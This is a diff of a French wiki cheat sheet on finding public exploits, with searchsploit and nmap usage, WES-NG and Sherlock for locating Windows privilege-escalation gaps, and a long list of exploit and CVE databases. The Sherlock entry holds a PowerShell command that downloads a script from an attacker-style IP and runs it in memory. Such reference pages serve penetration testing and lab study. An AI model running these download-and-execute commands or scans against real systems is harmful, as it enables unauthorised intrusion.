Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
trouver_des_exploits_publique [2020/08/05 23:25] M0N5T3R |
trouver_des_exploits_publique [2024/05/17 14:53] (Version actuelle) M0N5T3R [[Base de donnée d'Exploits et Vulnerabilités ]] |
||
---|---|---|---|
Ligne 9: | Ligne 9: | ||
**offline :** | **offline :** | ||
+ | * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns | ||
* SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf | * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf | ||
* -> git clone https://github.com/offensive-security/exploit-database.git | * -> git clone https://github.com/offensive-security/exploit-database.git | ||
Ligne 19: | Ligne 20: | ||
* -> searchsploit -x 7618[.c] #Open vi to inspect the exploit | * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit | ||
* -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result | * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result | ||
+ | * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result | ||
+ | * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml | ||
+ | * -> searchsploit -x --nmap resultat.xml | ||
+ | |||
+ | |||
* MSF-Search | * MSF-Search | ||
Ligne 32: | Ligne 38: | ||
* Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. | * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. | ||
* -> https://github.com/rasta-mouse/Sherlock | * -> https://github.com/rasta-mouse/Sherlock | ||
- | * -> ajouter à la fin du script : Find-AllVulns | + | * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns" |
- | * -> IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1') | + | * -> attend quelque minutes |
Ligne 47: | Ligne 52: | ||
* Windows Exploit Suggester - Next Generation (WES-NG) | * Windows Exploit Suggester - Next Generation (WES-NG) | ||
- | * -> git clone https://github.com/bitsadmin/wesng | + | * -> git clone https://github.com/bitsadmin/wesng.git |
* -> python wes.py --update | * -> python wes.py --update | ||
* -> python wes.py sysinfoTarget.txt | * -> python wes.py sysinfoTarget.txt | ||
Ligne 56: | Ligne 61: | ||
* -> wes.py systeminfo.txt - -impact "Remote Code Execution" | * -> wes.py systeminfo.txt - -impact "Remote Code Execution" | ||
* -> wes.py systeminfo.txt -i "Remote Code Execution" | * -> wes.py systeminfo.txt -i "Remote Code Execution" | ||
+ | * -> wes.py systeminfo.txt -i "Elevation of Privilege" | ||
* Only show vulnerabilities of a certain severity | * Only show vulnerabilities of a certain severity | ||
* -> wes.py systeminfo.txt --severity critical important | * -> wes.py systeminfo.txt --severity critical important | ||
Ligne 71: | Ligne 77: | ||
**online :** | **online :** | ||
+ | * https://cn-sec.com/?s=CVE | ||
+ | * https://snyk.io/vuln | ||
* http://www.securityfocus.com/ | * http://www.securityfocus.com/ | ||
* https://www.cvedetails.com/ | * https://www.cvedetails.com/ | ||
Ligne 102: | Ligne 110: | ||
* http://routerpwn.com/ | * http://routerpwn.com/ | ||
* https://www.rapid7.com/db/ | * https://www.rapid7.com/db/ | ||
- | * http://0day.today/ | + | * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]] |
* https://cve.mitre.org/cve/ | * https://cve.mitre.org/cve/ | ||
* http://www.exploitalert.com | * http://www.exploitalert.com | ||
Ligne 125: | Ligne 133: | ||
* https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available. | * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available. | ||
* https://cveapi.com/ cveapi - free API for CVE data. | * https://cveapi.com/ cveapi - free API for CVE data. | ||
- | |||
- | |||
* http://securityvulns.com/ | * http://securityvulns.com/ | ||
- | |||
* http://insecure.org/sploits_all.html | * http://insecure.org/sploits_all.html | ||
- | |||
- | |||
* http://zerodayinitiative.com/advisories/published/ | * http://zerodayinitiative.com/advisories/published/ | ||
- | |||
* http://nmrc.org/pub/index.html | * http://nmrc.org/pub/index.html | ||
+ | * http://oval.mitre.org | ||
+ | * https://github.com/qazbnm456/awesome-cve-poc | ||
+ | * https://github.com/pwnwiki/pwnwiki.github.io/ | ||
+ | * https://0dayfans.com/ | ||
+ | * https://www.seebug.org/ | ||
- | * http://oval.mitre.org | ||
+ | **Finding more information regarding the exploit ** | ||
+ | * http://www.cvedetails.com | ||
+ | * http://packetstormsecurity.org/files/cve/[CVE] | ||
+ | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] | ||
+ | * http://www.vulnview.com/cve-details.php?cvename=[CVE] | ||